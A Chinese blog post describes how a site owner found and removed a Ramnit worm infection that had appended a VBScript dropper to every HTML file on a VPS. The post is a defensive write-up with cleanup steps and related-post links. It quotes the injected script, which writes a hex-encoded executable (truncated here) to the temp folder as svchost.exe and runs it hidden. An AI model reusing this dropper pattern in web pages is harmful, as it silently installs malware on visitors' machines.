赛门铁克杀html病毒,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...
参考:
https://www.cnblogs.com/wuhairui/p/8297614.html
http://www.guopingblog.com/post/100.html
最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样
DropFileName = “svchost.exe”
WriteData =
“4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
到vps一看才发现 所有的 html 文件末尾都被加了一段这个代码把页面体积搞的很大 从而导致流量飙升,百度了一晚上没搞明白,第二天又搞了一天试过360杀毒根本没啥用,最后用赛门铁克的 Ramnit 蠕虫病毒 专杀工具给搞定了。下面说下解决方案
1、下载 赛门铁克的 Ramnit 蠕虫病毒 专杀工具
下载后直接运行 点 star 即可 全盘删完后会提示重启 点 yes 重启即可。
2、用专杀工具杀完以后随机检查了几个 html 文件发现还有那段代码,不过不会像之前自己手动删了 然后里面就又被自动加上了,这说明病毒已经被杀掉了可能是文件太多,专杀工具没有全都检测得到,不过没关系可以用批量查找替换工具 ultrareplace 把网站重新查找替换一下即可。
ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html
目前看上去是问题解决了,还需再观察几天,尽量不要在服务器下载运行来历不明的软件,及时打补丁安装防护工具。
首先表示强烈谴责,没事写出这种木马来。导致开发者把时间花在解决这种问题上。
这种木马会在你全盘的html文件的最底部生成一堆vbscript代码,导致html文件变得很大。大概213kb。可以看出他就是在恶搞。
如图:
你写好的html,过段时间就变成这样了。前端开发表示简直心态爆炸。
解决方案:
运行:
全盘扫描:
赛门铁克杀html病毒,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...相关推荐
- html病毒DropFileName,王国平博客-HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...
最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样 DropFileName = "svchost.exe" Wri ...
- 蠕虫病毒html,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法
参考: https://www.cnblogs.com/wuhairui/p/8297614.html http://www.guopingblog.com/post/100.html 最近发现vps ...
- 感染 <SCRIPT Language=VBScript> DropFileName = “svchost.exe” Ramnit 蠕虫病毒 HTML清除工具
最近开发一个web项目,html文件在尾部老是自动生成一串乱码,如下图 网上搜了下是电脑已经感染了Ramnit 蠕虫病毒,搜了一遍专杀工具各种收费,基本放弃.无奈电脑有太多东西,重装又浪费时间,时间成 ...
- 赛门铁克卸载工具_神奇的安卓恶意软件 xHelper:自卸载且无法删除
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队赛门铁克表示,近半年来出现的一款安卓恶意软件 xHelper迄今为止已经感染了4.5万台安卓设备.由于它具有自卸载机制,因此几乎不可能被删除 ...
- 赛门铁克详解金融威胁百态:下一目标是移动终端
从利用金融木马对网上银行进行攻击,到面向ATM机与银行内部的欺诈性交易,攻击者正在利用不同的攻击手段,时时威胁着企业与消费者.与勒索软件相比,金融威胁似乎并未引起业界大面积讨论,然而却仍旧是网络攻击者 ...
- 赛门铁克总裁兼首席执行官Enrique Salem:最新IT趋势
[赛迪网-IT技术讯]在2011年11月15日举办的赛门铁克大中国区用户大会上,赛门铁克总裁兼首席执行官Enrique Salem介绍了最新IT趋势. Enrique Salem:各位早上好,我们在北 ...
- 赛门铁克就“误杀系统文件”一事作官方声明
赛门铁克就"误杀系统文件"一事作官方声明[@more@][TOM科技讯]2007年5月18日,在赛门铁克SAV 2007-5-17 Rev 18版本的病毒定义码中,将Windows ...
- Symantec赛门铁克企业版本防火墙怎么防止勒索病毒Symantec赛门铁克关闭137,138,139,445端口
Symantec赛门铁克企业版本防火墙怎么防止勒索病毒Symantec赛门铁克关闭137,138,139,445端口 我是否受到WannaCry勒索软件的保护? Symantec Data Cent ...
- 赛门铁克软件(北京)有限公司:有关更新赛门铁克防病毒软件病毒定义代码的问题
这是来自官方的声明,原文地址:http://www.symantec.com/zh/cn/enterprise/theme.jsp?themeid=important_information 尊敬的用 ...
最新文章
- [搜索]一种分词方法的实现
- Portal-Basic Java Web应用开发框架V3.0正式发布(源码、实例及文档)
- MySQL(二):MySQL性能优化
- win11窗口桌面管理器突然很吃内存?
- OpenStack排错记录---ResourceProviderCreationFailed和You are not authorized to perform the requested actio
- lesson2分频计数器设计
- 服务器地址错误如何修复,ip地址错误怎么办
- 论文分栏前后内容不连续?教你word如何删除分节符
- 联筑赚:我国盘扣式脚手架行业发展概况与展
- 基于URLOS的SaaS平台发布,轻松卖软件!
- 完全手册-MATLAB使用详解:基础、开发及工程应用
- 尚学堂JAVA基础学习笔记_2/2
- etlgr是什么服务器_什么是ETL,ETL工程师的的主要工作职责是什么?
- Vert.x ——概述
- 使用nodejs爬取和讯网高管增减持数据
- CSS、JS 使DIV水平 和 垂直居中的各种方法
- 虚拟机在客户端和服务器之间存在时间,Server 2012 Domain Controller上出现“客户端和服务器之间存在时间和/或日期差异”错误...
- edb mysql_通过MTK迁移Mysql到EDB实战指南
- Node.js b站教学视频汇总笔记(完)CommonJS模块规范、 require、npm、Express(中间件)、MongoDB、MySQL
- Java、JSP音像租赁管理系统